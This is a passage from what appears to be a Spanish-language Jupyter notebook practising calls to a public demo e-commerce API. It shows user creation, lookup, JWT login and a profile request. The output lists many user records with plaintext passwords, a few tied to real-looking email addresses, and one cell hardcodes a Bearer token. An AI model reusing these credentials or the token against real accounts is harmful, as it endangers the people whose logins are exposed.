  'password': 'mate2802',
  'name': 'Teste',
  'role': 'customer',
  'avatar': 'https://imgur.com/gallery/default-avatar-profile-image-i9xknax',
  'creationAt': '2026-04-10T00:41:04.000Z',
  'updatedAt': '2026-04-10T00:41:04.000Z'},
 {'id': 12,
  'email': 'teste@teste.com',
  'password': 'teste1234',
  'name': 'Teste jan',
  'role': 'customer',
  'avatar': 'https://i.imgur.com/j0bX4FI.jpeg',
  'creationAt': '2026-04-10T00:47:38.000Z',
  'updatedAt': '2026-04-10T00:47:38.000Z'},
 {'id': 13,
  'email': 'teste@teste.com',
  'password': 'teste1233',
  'name': 'Teste jan',
  'role': 'customer',
  'avatar': 'https://i.imgur.com/j0bX4FI.jpeg',
  'creationAt': '2026-04-10T00:47:51.000Z',
  'updatedAt': '2026-04-10T00:47:51.000Z'},
 {'id': 14,
  'email': 'mtex613@gmail.com',
  'password': 'mate2802',
  'name': 'mateus',
  'role': 'customer',
  'avatar': 'https://imgur.com/t/avatar_the',
  'creationAt': '2026-04-10T00:49:31.000Z',
  'updatedAt': '2026-04-10T00:49:31.000Z'},
 {'id': 15,
  'email': 'chi@gmail.com',
  'password': '111111',
  'name': 'chi',
  'role': 'customer',
  'avatar': 'https://i.pravatar.cc/300',
  'creationAt': '2026-04-10T00:49:43.000Z',
  'updatedAt': '2026-04-10T00:49:43.000Z'},
 {'id': 16,
  'email': 'test1221@gmail.com',
  'password': 'test213131',
  'name': 'test12123',
  'role': 'customer',
  'avatar': 'https://test.net',
  'creationAt': '2026-04-10T00:58:06.000Z',
  'updatedAt': '2026-04-10T00:58:06.000Z'},
 {'id': 17,
  'email': 'test1221@gmail.com',
  'password': 'test213131',
  'name': 'test12123',
  'role': 'customer',
  'avatar': 'https://test.net',
  'creationAt': '2026-04-10T01:06:13.000Z',
  'updatedAt': '2026-04-10T01:06:13.000Z'},
 {'id': 18,
  'email': 'test1221@gmail.com',
  'password': 'test213131',
  'name': 'test12123',
  'role': 'customer',
  'avatar': 'https://test.net',
  'creationAt': '2026-04-10T01:07:11.000Z',
  'updatedAt': '2026-04-10T01:07:11.000Z'},
 {'id': 19,
  'email': 'test1221@gmail.com',
  'password': 'test213131',
  'name': 'test12123',
  'role': 'customer',
  'avatar': 'https://test.net',
  'creationAt': '2026-04-10T01:11:11.000Z',
  'updatedAt': '2026-04-10T01:11:11.000Z'},
 {'id': 20,
  'email': 'test1221@gmail.com',
  'password': 'test213131',
  'name': 'test12123',
  'role': 'customer',
  'avatar': 'https://test.net',
  'creationAt': '2026-04-10T01:13:38.000Z',
  'updatedAt': '2026-04-10T01:13:38.000Z'},
 {'id': 21,
  'email': 'test@test.com',
  'password': 'test',
  'name': 'Test User',
  'role': 'customer',
  'avatar': 'https://api.escuelajs.co/api/v1/files/1e5b.jpg',
  'creationAt': '2026-04-10T01:22:06.000Z',
  'updatedAt': '2026-04-10T14:05:47.000Z'},
 {'id': 22,
  'email': 'test1221@gmail.com',
  'password': 'test213131',
  'name': 'test12123',
  'role': 'customer',
  'avatar': 'https://test.net',
  'creationAt': '2026-04-10T01:23:04.000Z',
  'updatedAt': '2026-04-10T01:23:04.000Z'},
 {'id': 23,
  'email': 'test1221@gmail.com',
  'password': 'test213131',
  'name': 'test9993',
  'role': 'customer',
  'avatar': 'https://test.net',
  'creationAt': '2026-04-10T01:25:29.000Z',
  'updatedAt': '2026-04-10T01:56:12.000Z'},
 {'id': 24,
  'email': 'test_1775784964486@gmail.com',
  'password': '123456',
  'name': 'test_user',
  'role': 'customer',
  'avatar': 'https://test.net',
  'creationAt': '2026-04-10T01:36:06.000Z',
  'updatedAt': '2026-04-10T01:36:06.000Z'},
 {'id': 26,
  'email': 'nico@gmail.com',
  'password': '1234',
  'name': 'Nicolas',
  'role': 'customer',
  'avatar': 'https://picsum.photos/800',
  'creationAt': '2026-04-10T01:54:21.000Z',
  'updatedAt': '2026-04-10T01:54:21.000Z'},
 {'id': 27,
  'email': 'javi@mail.com',
  'password': '1234',
  'name': 'javi',
  'role': 'customer',
  'avatar': 'https://i.imgur.com/yhW6Yw1.jpg',
  'creationAt': '2026-04-10T01:54:30.000Z',
  'updatedAt': '2026-04-10T01:54:30.000Z'},
 {'id': 29,
  'email': 'test_1775787267517@gmail.com',
  'password': '123456',
  'name': 'test_user',
  'role': 'customer',
  'avatar': 'https://test.net',
  'creationAt': '2026-04-10T02:14:29.000Z',
  'updatedAt': '2026-04-10T02:14:29.000Z'},
 {'id': 30,
  'email': 'test_1775787402301@gmail.com',
  'password': '123456',
  'name': 'test_user',
  'role': 'customer',
  'avatar': 'https://test.net',
  'creationAt': '2026-04-10T02:16:43.000Z',
  'updatedAt': '2026-04-10T02:16:43.000Z'},
 {'id': 31,
  'email': 'test_1775787434263@gmail.com',
  'password': '123456',
  'name': 'test_user',
  'role': 'customer',
  'avatar': 'https://test.net',
  'creationAt': '2026-04-10T02:17:15.000Z',
  'updatedAt': '2026-04-10T02:17:15.000Z'},
 {'id': 32,
  'email': 'test_1775787596970@gmail.com',
  'password': '123456',
  'name': 'test_user',
  'role': 'customer',
  'avatar': 'https://test.net',
  'creationAt': '2026-04-10T02:19:58.000Z',
  'updatedAt': '2026-04-10T02:19:58.000Z'},
 {'id': 34,
  'email': 'test_1775788707392@gmail.com',
  'password': '123456',
  'name': 'test_user',
  'role': 'customer',
  'avatar': 'https://test.net',
  'creationAt': '2026-04-10T02:38:28.000Z',
  'updatedAt': '2026-04-10T02:38:28.000Z'},
 {'id': 35,
  'email': 'test_1775788865316@gmail.com',
  'password': '123456',
  'name': 'test_user',
  'role': 'customer',
  'avatar': 'https://test.net',
  'creationAt': '2026-04-10T02:41:06.000Z',
  'updatedAt': '2026-04-10T02:41:06.000Z'},
 {'id': 36,
  'email': 'test_1775788907571@gmail.com',
  'password': '123456',
  'name': 'test_user',
  'role': 'customer',
  'avatar': 'https://test.net',
  'creationAt': '2026-04-10T02:41:48.000Z',
  'updatedAt': '2026-04-10T02:41:48.000Z'},
 {'id': 37,
  'email': 'test_1775789720990@gmail.com',
  'password': '123456',
  'name': 'test_user',
  'role': 'customer',
  'avatar': 'https://test.net',
  'creationAt': '2026-04-10T02:55:22.000Z',
  'updatedAt': '2026-04-10T02:55:22.000Z'},
 {'id': 38,
  'email': 'test_1775789721490@gmail.com',
  'password': '123456',
  'name': 'test_user',
  'role': 'customer',
  'avatar': 'https://test.net',
  'creationAt': '2026-04-10T02:55:22.000Z',
  'updatedAt': '2026-04-10T02:55:22.000Z'},
 {'id': 39,
  'email': 'test_1775789721099@gmail.com',
  'password': '123456',
  'name': 'test_user',
  'role': 'customer',
  'avatar': 'https://test.net',
  'creationAt': '2026-04-10T02:55:22.000Z',
  'updatedAt': '2026-04-10T02:55:22.000Z'},
 {'id': 40,
  'email': 'test_1775789720599@gmail.com',
  'password': '123456',
  'name': 'test_user',
  'role': 'customer',
  'avatar': 'https://test.net',
  'creationAt': '2026-04-10T02:55:22.000Z',
  'updatedAt': '2026-04-10T02:55:22.000Z'},
 {'id': 41,
  'email': 'test_1775789720896@gmail.com',
  'password': '123456',
  'name': 'test_user',
  'role': 'customer',
  'avatar': 'https://test.net',
  'creationAt': '2026-04-10T02:55:22.000Z',
  'updatedAt': '2026-04-10T02:55:22.000Z'},
 {'id': 42,
  'email': 'test_1775789721693@gmail.com',
  'password': '123456',
  'name': 'test_user',
  'role': 'customer',
  'avatar': 'https://test.net',
  'creationAt': '2026-04-10T02:55:22.000Z',
  'updatedAt': '2026-04-10T02:55:22.000Z'},
 {'id': 43,
  'email': 'test_1775789721193@gmail.com',
  'password': '123456',
  'name': 'test_user',
  'role': 'customer',
  'avatar': 'https://test.net',
  'creationAt': '2026-04-10T02:55:22.000Z',
  'updatedAt': '2026-04-10T02:55:22.000Z'},
 {'id': 44,
  'email': 'test_1775789720505@gmail.com',
  'password': '123456',
  'name': 'test_user',
  'role': 'customer',
  'avatar': 'https://test.net',
  'creationAt': '2026-04-10T02:55:22.000Z',
  'updatedAt': '2026-04-10T02:55:22.000Z'},
 {'id': 45,
  'email': 'test_1775789720693@gmail.com',
  'password': '123456',
  'name': 'test_user',
  'role': 'customer',
  'avatar': 'https://test.net',
  'creationAt': '2026-04-10T02:55:22.000Z',
  'updatedAt': '2026-04-10T02:55:22.000Z'},
 {'id': 46,
  'email': 'test_1775789720802@gmail.com',
  'password': '123456',
  'name': 'test_user',
  'role': 'customer',
  'avatar': 'https://test.net',
  'creationAt': '2026-04-10T02:55:22.000Z',
  'updatedAt': '2026-04-10T02:55:22.000Z'},
 {'id': 47,
  'email': 'test_1775789722100@gmail.com',
  'password': '123456',
  'name': 'test_user',
  'role': 'customer',
  'avatar': 'https://test.net',
  'creationAt': '2026-04-10T02:55:23.000Z',
  'updatedAt': '2026-04-10T02:55:23.000Z'},
 {'id': 48,
  'email': 'test_1775789721396@gmail.com',
  'password': '123456',
  'name': 'test_user',
  'role': 'customer',
  'avatar': 'https://test.net',
  'creationAt': '2026-04-10T02:55:23.000Z',
  'updatedAt': '2026-04-10T02:55:23.000Z'},
 {'id': 49,
  'email': 'test_1775789721599@gmail.com',
  'password': '123456',
  'name': 'test_user',
  'role': 'customer',
  'avatar': 'https://test.net',
  'creationAt': '2026-04-10T02:55:23.000Z',
  'updatedAt': '2026-04-10T02:55:23.000Z'},
 {'id': 50,
  'email': 'test_1775789721802@gmail.com',
  'password': '123456',
  'name': 'test_user',
  'role': 'customer',
  'avatar': 'https://test.net',
  'creationAt': '2026-04-10T02:55:23.000Z',
  'updatedAt': '2026-04-10T02:55:23.000Z'},
 {'id': 51,
  'email': 'test_1775789722495@gmail.com',
  'password': '123456',
  'name': 'test_user',
  'role': 'customer',
  'avatar': 'https://test.net',
  'creationAt': '2026-04-10T02:55:23.000Z',
  'updatedAt': '2026-04-10T02:55:23.000Z'},
 {'id': 52,
  'email': 'test_1775789722594@gmail.com',
  'password': '123456',
  'name': 'test_user',
  'role': 'customer',
  'avatar': 'https://test.net',
  'creationAt': '2026-04-10T02:55:23.000Z',
  'updatedAt': '2026-04-10T02:55:23.000Z'},
 {'id': 53,
  'email': 'test_1775789722397@gmail.com',
  'password': '123456',
  'name': 'test_user',
  'role': 'customer',
  'avatar': 'https://test.net',
  'creationAt': '2026-04-10T02:55:23.000Z',
  'updatedAt': '2026-04-10T02:55:23.000Z'},
 {'id': 54,
  'email': 'test_1775789722690@gmail.com',
  'password': '123456',
  'name': 'test_user',
  'role': 'customer',
  'avatar': 'https://test.net',
  'creationAt': '2026-04-10T02:55:23.000Z',
  'updatedAt': '2026-04-10T02:55:23.000Z'},
 {'id': 55,
  'email': 'test_1775789722193@gmail.com',
  'password': '123456',
  'name': 'test_user',
  'role': 'customer',
  'avatar': 'https://test.net',
  'creationAt': '2026-04-10T02:55:23.000Z',
  'updatedAt': '2026-04-10T02:55:23.000Z'},
 {'id': 56,
  'email': 'test_1775789722303@gmail.com',
  'password': '123456',
  'name': 'test_user',
  'role': 'customer',
  'avatar': 'https://test.net',
  'creationAt': '2026-04-10T02:55:23.000Z',
  'updatedAt': '2026-04-10T02:55:23.000Z'},
 {'id': 57,
  'email': 'test_1775789722794@gmail.com',
  'password': '123456',
  'name': 'test_user',
  'role': 'customer',
  'avatar': 'https://test.net',
  'creationAt': '2026-04-10T02:55:24.000Z',
  'updatedAt': '2026-04-10T02:55:24.000Z'},
 {'id': 58,
  'email': 'test_1775789722894@gmail.com',
  'password': '123456',
  'name': 'test_user',
  'role': 'customer',
  'avatar': 'https://test.net',
  'creationAt': '2026-04-10T02:55:24.000Z',
  'updatedAt': '2026-04-10T02:55:24.000Z'},
 {'id': 59,
  'email': 'test_1775789722991@gmail.com',
  'password': '123456',
  'name': 'test_user',
  'role': 'customer',
  'avatar': 'https://test.net',
  'creationAt': '2026-04-10T02:55:24.000Z',
  'updatedAt': '2026-04-10T02:55:24.000Z'},
 {'id': 60,
  'email': 'test_1775789723191@gmail.com',
  'password': '123456',
  'name': 'test_user',
  'role': 'customer',
  'avatar': 'https://test.net',
  'creationAt': '2026-04-10T02:55:24.000Z',
  'updatedAt': '2026-04-10T02:55:24.000Z'},
 {'id': 61,
  'email': 'test_1775789723291@gmail.com',
  'password': '123456',
  'name': 'test_user',
  'role': 'customer',
  'avatar': 'https://test.net',
  'creationAt': '2026-04-10T02:55:24.000Z',
  'updatedAt': '2026-04-10T02:55:24.000Z'},
 {'id': 62,
  'email': 'test_1775789723792@gmail.com',
  'password': '123456',
  'name': 'test_user',
  'role': 'customer',
  'avatar': 'https://test.net',
  'creationAt': '2026-04-10T02:55:24.000Z',
  'updatedAt': '2026-04-10T02:55:24.000Z'},
 {'id': 63,
  'email': 'test_1775789723692@gmail.com',
  'password': '123456',
  'name': 'test_user',
  'role': 'customer',
  'avatar': 'https://test.net',
  'creationAt': '2026-04-10T02:55:24.000Z',
  'updatedAt': '2026-04-10T02:55:24.000Z'},
 {'id': 64,
  'email': 'test_1775789723891@gmail.com',
  'password': '123456',
  'name': 'test_user',
  'role': 'customer',
  'avatar': 'https://test.net',
  'creationAt': '2026-04-10T02:55:24.000Z',
  'updatedAt': '2026-04-10T02:55:24.000Z'},
 {'id': 65,
  'email': 'test_1775789723390@gmail.com',
  'password': '123456',
  'name': 'test_user',
  'role': 'customer',
  'avatar': 'https://test.net',
  'creationAt': '2026-04-10T02:55:24.000Z',
  'updatedAt': '2026-04-10T02:55:24.000Z'},
 {'id': 66,
  'email': 'test_1775789723991@gmail.com',
  'password': '123456',
  'name': 'test_user',
  'role': 'customer',
  'avatar': 'https://test.net',
  'creationAt': '2026-04-10T02:55:24.000Z',
  'updatedAt': '2026-04-10T02:55:24.000Z'},
 {'id': 67,
  'email': 'test_1775789724092@gmail.com',
  'password': '123456',
  'name': 'test_user',
  'role': 'customer',
  'avatar': 'https://test.net',
  'creationAt': '2026-04-10T02:55:24.000Z',
  'updatedAt': '2026-04-10T02:55:24.000Z'},
 {'id': 68,
  'email': 'test_1775789724392@gmail.com',
  'password': '123456',
  'name': 'test_user',
  'role': 'customer',
  'avatar': 'https://test.net',
  'creationAt': '2026-04-10T02:55:25.000Z',
  'updatedAt': '2026-04-10T02:55:25.000Z'},
 {'id': 69,
  'email': 'test_1775789723491@gmail.com',
  'password': '123456',
  'name': 'test_user',
  'role': 'customer',
  'avatar': 'https://test.net',
  'creationAt': '2026-04-10T02:55:25.000Z',
  'updatedAt': '2026-04-10T02:55:25.000Z'},
 {'id': 70,
  'email': 'test_1775789724505@gmail.com',
  'password': '123456',
  'name': 'test_user',
  'role': 'customer',
  'avatar': 'https://test.net',
  'creationAt': '2026-04-10T02:55:25.000Z',
  'updatedAt': '2026-04-10T02:55:25.000Z'},
 {'id': 71,
  'email': 'test_1775789724192@gmail.com',
  'password': '123456',
  'name': 'test_user',
  'role': 'customer',
  'avatar': 'https://test.net',
  'creationAt': '2026-04-10T02:55:25.000Z',
  'updatedAt': '2026-04-10T02:55:25.000Z'},
 {'id': 72,
  'email': 'test_1775789724607@gmail.com',
  'password': '123456',
  'name': 'test_user',
  'role': 'customer',
  'avatar': 'https://test.net',
  'creationAt': '2026-04-10T02:55:25.000Z',
  'updatedAt': '2026-04-10T02:55:25.000Z'},
 {'id': 73,
  'email': 'test_1775789724293@gmail.com',
  'password': '123456',
  'name': 'test_user',
  'role': 'customer',
  'avatar': 'https://test.net',
  'creationAt': '2026-04-10T02:55:25.000Z',
  'updatedAt': '2026-04-10T02:55:25.000Z'},
 {'id': 74,
  'email': 'test_1775789724701@gmail.com',
  'password': '123456',
  'name': 'test_user',
  'role': 'customer',
  'avatar': 'https://test.net',
  'creationAt': '2026-04-10T02:55:25.000Z',
  'updatedAt': '2026-04-10T02:55:25.000Z'},
 {'id': 75,
  'email': 'test_1775789723591@gmail.com',
  'password': '123456',
  'name': 'test_user',
  'role': 'customer',
  'avatar': 'https://test.net',
  'creationAt': '2026-04-10T02:55:26.000Z',
  'updatedAt': '2026-04-10T02:55:26.000Z'},
 {'id': 76,
  'email': 'test_1775789724998@gmail.com',
  'password': '123456',
  'name': 'test_user',
  'role': 'customer',
  'avatar': 'https://test.net',
  'creationAt': '2026-04-10T02:55:26.000Z',
  'updatedAt': '2026-04-10T02:55:26.000Z'},
 {'id': 77,
  'email': 'test_1775789725295@gmail.com',
  'password': '123456',
  'name': 'test_user',
  'role': 'customer',
  'avatar': 'https://test.net',
  'creationAt': '2026-04-10T02:55:26.000Z',
  'updatedAt': '2026-04-10T02:55:26.000Z'},
 {'id': 78,
  'email': 'test_1775789725405@gmail.com',
  'password': '123456',
  'name': 'test_user',
  'role': 'customer',
  'avatar': 'https://test.net',
  'creationAt': '2026-04-10T02:55:26.000Z',
  'updatedAt': '2026-04-10T02:55:26.000Z'},
 {'id': 79,
  'email': 'test_1775789725499@gmail.com',
  'password': '123456',
  'name': 'test_user',
  'role': 'customer',
  'avatar': 'https://test.net',
  'creationAt': '2026-04-10T02:55:26.000Z',
  'updatedAt': '2026-04-10T02:55:26.000Z'},
 {'id': 80,
  'email': 'test_1775789724904@gmail.com',
  'password': '123456',
  'name': 'test_user',
  'role': 'customer',
  'avatar': 'https://test.net',
  'creationAt': '2026-04-10T02:55:26.000Z',
  'updatedAt': '2026-04-10T02:55:26.000Z'},
 {'id': 81,
  'email': 'test_1775789725702@gmail.com',
  'password': '123456',
  'name': 'test_user',
  'role': 'customer',
  'avatar': 'https://test.net',
  'creationAt': '2026-04-10T02:55:26.000Z',
  'updatedAt': '2026-04-10T02:55:26.000Z'},
 {'id': 82,
  'email': 'test_1775789725091@gmail.com',
  'password': '123456',
  'name': 'test_user',
  'role': 'customer',
  'avatar': 'https://test.net',
  'creationAt': '2026-04-10T02:55:26.000Z',
  'updatedAt': '2026-04-10T02:55:26.000Z'},
 {'id': 83,
  'email': 'test_1775789725796@gmail.com',
  'password': '123456',
  'name': 'test_user',
  'role': 'customer',
  'avatar': 'https://test.net',
  'creationAt': '2026-04-10T02:55:26.000Z',
  'updatedAt': '2026-04-10T02:55:26.000Z'},
 {'id': 84,
  'email': 'test_1775789726093@gmail.com',
  'password': '123456',
  'name': 'test_user',
  'role': 'customer',
  'avatar': 'https://test.net',
  'creationAt': '2026-04-10T02:55:26.000Z',
  'updatedAt': '2026-04-10T02:55:26.000Z'},
 {'id': 85,
  'email': 'test_1775789725999@gmail.com',
  'password': '123456',
  'name': 'test_user',
  'role': 'customer',
  'avatar': 'https://test.net',
  'creationAt': '2026-04-10T02:55:27.000Z',
  'updatedAt': '2026-04-10T02:55:27.000Z'},
 {'id': 86,
  'email': 'test_1775789726203@gmail.com',
  'password': '123456',
  'name': 'test_user',
  'role': 'customer',
  'avatar': 'https://test.net',
  'creationAt': '2026-04-10T02:55:27.000Z',
  'updatedAt': '2026-04-10T02:55:27.000Z'},
 {'id': 87,
  'email': 'test_1775789725592@gmail.com',
  'password': '123456',
  'name': 'test_user',
  'role': 'customer',
  'avatar': 'https://test.net',
  'creationAt': '2026-04-10T02:55:27.000Z',
  'updatedAt': '2026-04-10T02:55:27.000Z'},
 {'id': 88,
  'email': 'test_1775789725905@gmail.com',
  'password': '123456',
  'name': 'test_user',
  'role': 'customer',
  'avatar': 'https://test.net',
  'creationAt': '2026-04-10T02:55:27.000Z',
  'updatedAt': '2026-04-10T02:55:27.000Z'},
 {'id': 89,
  'email': 'test_1775789726390@gmail.com',
  'password': '123456',
  'name': 'test_user',
  'role': 'customer',
  'avatar': 'https://test.net',
  'creationAt': '2026-04-10T02:55:27.000Z',
  'updatedAt': '2026-04-10T02:55:27.000Z'},
 {'id': 90,
  'email': 'test_1775789726500@gmail.com',
  'password': '123456',
  'name': 'test_user',
  'role': 'customer',
  'avatar': 'https://test.net',
  'creationAt': '2026-04-10T02:55:27.000Z',
  'updatedAt': '2026-04-10T02:55:27.000Z'},
 {'id': 91,
  'email': 'test_1775789726591@gmail.com',
  'password': '123456',
  'name': 'test_user',
  'role': 'customer',
  'avatar': 'https://test.net',
  'creationAt': '2026-04-10T02:55:27.000Z',

In [23]:
""" Creamos el usuario """
from requests.exceptions import RequestException
user = {
    'email': 'mai@mail.com',
    'password': '1234',
    'name': 'mai',
    'role': 'customer',
    'avatar': 'https://i.imgur.com/yhW6Yw1.jpg'
}
try:
    response = requests.post('https://api.escuelajs.co/api/v1/users', json=user)
    response.raise_for_status()
    response.json()

except RequestException as e:
    print(f"Error general: {e}")

In [24]:
""" Verificamos que exista el usuario """
response = requests.get('https://api.escuelajs.co/api/v1/users/27')
response.json()

{'id': 27,
 'email': 'javi@mail.com',
 'password': '1234',
 'name': 'javi',
 'role': 'customer',
 'avatar': 'https://i.imgur.com/yhW6Yw1.jpg',
 'creationAt': '2026-04-10T01:54:30.000Z',
 'updatedAt': '2026-04-10T01:54:30.000Z'}

In [25]:
""" Autenticamos con JWT """
user_header = {
    "Content-Type": "application/json"
}

user = {
    "email": "javi@mail.com",
    "password": "1234"
}
try:
    response = requests.post('https://api.escuelajs.co/api/v1/auth/login', headers=user_header, json=user)
    response.raise_for_status()
    response.json()
except RequestException as e:
    print(f"Error general: {e}")

In [26]:
""" Recuperamos el usuario mediante token """

user_header = {
    "Authorization": "Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOjI3LCJpYXQiOjE3NzU3ODY0MTIsImV4cCI6MTc3NzUxNDQxMn0.kIsGh-P58eJ9GiwFQYn7i9oh-Gvltmyju4ckiXC52MQ"
}

""" Verificamos si hubo algun error """
try:
    response = requests.get('https://api.escuelajs.co/api/v1/auth/profile', headers=user_header)
    response.raise_for_status()
    response.json()

except RequestException as e:
    print(f"Error: {e}")